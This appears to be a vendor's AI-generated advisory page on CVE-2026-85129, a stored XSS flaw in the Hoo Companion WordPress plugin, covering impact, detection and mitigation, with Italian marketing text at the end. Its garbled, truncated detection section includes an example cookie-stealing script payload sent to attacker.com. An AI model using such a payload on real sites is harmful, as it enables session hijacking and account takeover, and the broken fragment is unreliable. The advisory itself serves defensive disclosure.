
PEACH
Un framework di isolamento del tenant
CVE-2026-85129 is an unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in the Hoo Companion WordPress plugin version 1.0.2. The flaw exists in the plugin's theme settings import feature, which lacks authorization, input validation, and sanitization, allowing any unauthenticated attacker to inject persistent malicious scripts that execute for all site visitors, including administrators. It was publicly disclosed on September 10, 2026, and published to the NVD and GitHub Advisory Database on September 13, 2026. The vulnerability carries a CVSS v3.1 base score of 8.8 (High) (WPScan, GitHub Advisory).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin's import feature accepts arbitrary data over the network without performing any authorization checks (no authentication required), input validation, or output sanitization before storing the submitted content as the active WordPress theme's settings. This results in a stored XSS condition where injected scripts are persistently saved and rendered to every visitor of the affected site. Additionally, the same malicious import request overwrites and destroys the site's existing theme settings, causing a secondary availability impact (WPScan, GitHub Advisory).
Successful exploitation allows an unauthenticated remote attacker to inject arbitrary JavaScript that executes persistently in the browsers of all site visitors, including administrators. This can lead to session hijacking, credential theft, unauthorized administrative actions (e.g., account takeover via admin cookie theft), and further site compromise. Additionally, the exploit request irreversibly destroys the site's existing theme settings, causing a significant availability and integrity impact to the WordPress site's appearance and configuration (WPScan, GitHub Advisory).
There is currently no public proof-of-concept exploit code available; WPScan has indicated a PoC will be disclosed on October 1, 2026, to allow time for users to update. No in-the-wild exploitation has been observed, and no threat actor attribution has been reported. The EPSS score is approximately 0.263% (18th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (WPScan, GitHub Advisory).
/wp-content/plugins/hoo-companion/).<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) embedded within the expected data structure.admin-ajax.php with plugin-specific action parameters) from unknown or external IP addresses.wp_options table under theme settings keys associated with the Hoo Companion plugin, particularly values containing <script> tags or encoded JavaScript.The WPScan advisory notes there is currently no known fixed version of the Hoo Companion plugin (version 1.0.2 is the only known release). Site administrators should immediately disable or remove the Hoo Companion plugin until a patched version is available. As interim mitigations, restrict access to the plugin's import endpoint using a Web Application Firewall (WAF) rule, or implement server-level access controls (e.g., IP allowlisting) to block unauthenticated requests to the vulnerable functionality. Monitor the WordPress plugin repository for an updated release (WPScan, GitHub Advisory).
The vulnerability was discovered and reported by researchers Enrico Marcolini, Claudio Marchesini, and Dottor Marc (affiliated with dottormarc.it), and was verified by WPScan (WPScan). Brief mentions appeared on Mastodon via The Hacker Wire and in a Reddit CVE daily brief on r/pwnhub, but no significant broader media coverage or notable researcher commentary beyond the initial disclosure has been identified.
Fonte: Questo report è stato generato utilizzando l'intelligenza artificiale
Valutazione gratuita delle vulnerabilità
Valuta le tue pratiche di sicurezza cloud in 9 domini di sicurezza per confrontare il tuo livello di rischio e identificare le lacune nelle tue difese.
Richiedi una demo personalizzata
"La migliore esperienza utente che abbia mai visto offre piena visibilità ai carichi di lavoro cloud."
"Wiz fornisce un unico pannello di controllo per vedere cosa sta succedendo nei nostri ambienti cloud."
"Sappiamo che se Wiz identifica qualcosa come critico, in realtà lo è."